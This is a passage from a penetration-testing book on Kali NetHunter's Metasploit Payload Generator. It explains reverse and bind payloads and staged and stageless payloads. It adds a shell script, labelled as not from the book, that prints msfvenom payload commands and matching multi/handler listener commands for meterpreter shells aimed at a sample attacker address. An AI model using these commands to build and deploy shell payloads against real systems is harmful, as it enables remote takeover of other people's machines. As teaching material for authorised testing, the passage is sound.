Hands-On Penetration Testing with Kali NetHunter

The Metasploit Payload Generator

One of the most challenging phases of a penetration test is the Exploitation (or Gaining Access) phase. A penetration tester may rely on an existing exploit within the Metasploit Framework (MSF); if the target system has been patched against that vulnerability, however, the exploit will most likely fail. The MSF also includes msfvenom, a payload-generator utility that lets a penetration tester create customized payloads rather than depending on a stock exploit.

The Metasploit Payload Generator allows a penetration tester to easily create payloads using the following options:

  • Output type, such as ASP, Bash (.sh), PHP, PowerShell (.ps1), Python (.py), or a Windows executable (.exe). This lets the payload be crafted for a specific target platform.
  • The IP address and port number the payload uses: for a reverse payload this is the attacker's listener, for a bind payload the port the target listens on.
  • Payload type: either the default MSF payload or a command-prompt (CMD) payload.

The following is the interface for the Metasploit Payload Generator on Kali NetHunter. It shows the various options available to us and how simple it is to create a payload using this application. Upon completion, the payload can be saved to local storage on the Android device or sent to an HTTP address:

The created payloads can be in the following form:

  • Reverse or bind: With a reverse payload, the compromised target initiates the connection back to the attacker's listener and hands over its shell; this is known as a reverse connection, and it works through NAT and outbound-only firewalls because the target dials out. With a bind payload, the payload opens a listening port on the target once it runs, and the attacker then connects to that port to obtain the shell; this requires the target's port to be reachable from the attacker.
  • Staged or stageless: A staged payload delivers the exploitation in stages. A small initial stager is sent to the target; once it runs, it connects back and downloads the remainder of the payload (the stage) from the attacker's handler, so the handler must be running for the session to complete. A stageless payload is a single, larger file that carries all of its functionality and is sent to the target in one piece.
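The options and payload shapes listed above map directly onto msfvenom command lines, and the most common mistake in practice is a handler whose payload name or connection parameters do not match what was generated. The following shell script is an added example, not code from the book or from NetHunter: it validates the IP address and port, builds the payload name for each reverse/bind and staged/stageless combination using the framework's naming convention (a `/` between stage and stager for staged payloads, an `_` for stageless ones), and emits both the msfvenom command and the matching multi/handler command. It only composes the commands and never runs msfvenom, so it can be checked anywhere. The hosts 10.0.0.5 and 10.0.0.20 and the output file names are constructed sample values, and the platform list is limited to payload names I am confident exist; confirm any other name with `msfvenom -l payloads` before relying on it.

```shell
#!/bin/sh
# Added example (not from the book): compose msfvenom and handler commands
# for reverse/bind x staged/stageless payloads. Commands are printed, not run.

# Return non-zero unless $1 is a dotted-quad IPv4 address with octets 0-255.
valid_ipv4() {
    case "$1" in
        *[!0-9.]*|.*|*.|*..*|'') return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

# Return non-zero unless $1 is a TCP port in 1..65535.
valid_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Build the MSF payload name: <platform> <reverse|bind> <staged|stageless>.
# Staged:    windows/meterpreter/reverse_tcp   (stager fetches the stage)
# Stageless: windows/meterpreter_reverse_tcp   (everything in one file)
msf_payload_name() {
    local platform=$1 conn=$2 staging=$3 stem
    case "$platform" in
        windows) stem=windows/meterpreter ;;
        python)  stem=python/meterpreter ;;
        *) echo "unsupported platform: $platform" >&2; return 1 ;;
    esac
    case "$conn" in reverse|bind) ;; *) echo "conn must be reverse|bind" >&2; return 1 ;; esac
    case "$staging" in
        staged)    printf '%s/%s_tcp\n' "$stem" "$conn" ;;
        stageless) printf '%s_%s_tcp\n' "$stem" "$conn" ;;
        *) echo "staging must be staged|stageless" >&2; return 1 ;;
    esac
}

# Build the msfvenom command. For a reverse payload the host is the attacker's
# LHOST and is baked into the payload; for a bind payload only LPORT is baked in,
# because the target's address is needed by the handler, not by the payload.
msf_gen_cmd() {
    local platform=$1 conn=$2 staging=$3 host=$4 port=$5 out=$6 name fmt
    name=$(msf_payload_name "$platform" "$conn" "$staging") || return 1
    valid_port "$port" || { echo "bad port: $port" >&2; return 1; }
    case "$platform" in
        windows) fmt=exe ;;   # native Windows executable
        python)  fmt=raw ;;   # raw Python source, save as .py
    esac
    case "$conn" in
        reverse)
            valid_ipv4 "$host" || { echo "bad LHOST: $host" >&2; return 1; }
            printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' \
                "$name" "$host" "$port" "$fmt" "$out" ;;
        bind)
            printf 'msfvenom -p %s LPORT=%s -f %s -o %s\n' \
                "$name" "$port" "$fmt" "$out" ;;
    esac
}

# Build the matching multi/handler command. PAYLOAD must be the exact name
# that was generated; a staged handler cannot serve a stageless payload.
# Reverse: the handler listens on LHOST:LPORT. Bind: it connects to RHOST:LPORT.
msf_handler_cmd() {
    local name=$1 conn=$2 host=$3 port=$4 var
    valid_ipv4 "$host" || { echo "bad host: $host" >&2; return 1; }
    valid_port "$port" || { echo "bad port: $port" >&2; return 1; }
    case "$conn" in
        reverse) var=LHOST ;;
        bind)    var=RHOST ;;
        *) echo "conn must be reverse|bind" >&2; return 1 ;;
    esac
    printf 'msfconsole -q -x "use exploit/multi/handler; set PAYLOAD %s; set %s %s; set LPORT %s; run"\n' \
        "$name" "$var" "$host" "$port"
}

# Constructed sample values: attacker 10.0.0.5, target 10.0.0.20, port 4444.
msf_gen_cmd windows reverse staged 10.0.0.5 4444 shell.exe
msf_handler_cmd "$(msf_payload_name windows reverse staged)" reverse 10.0.0.5 4444
msf_gen_cmd windows bind stageless 10.0.0.20 4444 bind.exe
msf_handler_cmd "$(msf_payload_name windows bind stageless)" bind 10.0.0.20 4444
```

The two printed pairs show the practical difference between the shapes: the reverse payload carries the attacker's address and the handler waits on it, while the bind payload carries only a port and the target's address appears in the handler as RHOST. Generating the payload in the NetHunter app and then starting a handler with a different payload name, or with LHOST set to an address the target cannot reach, is the usual reason a session never arrives.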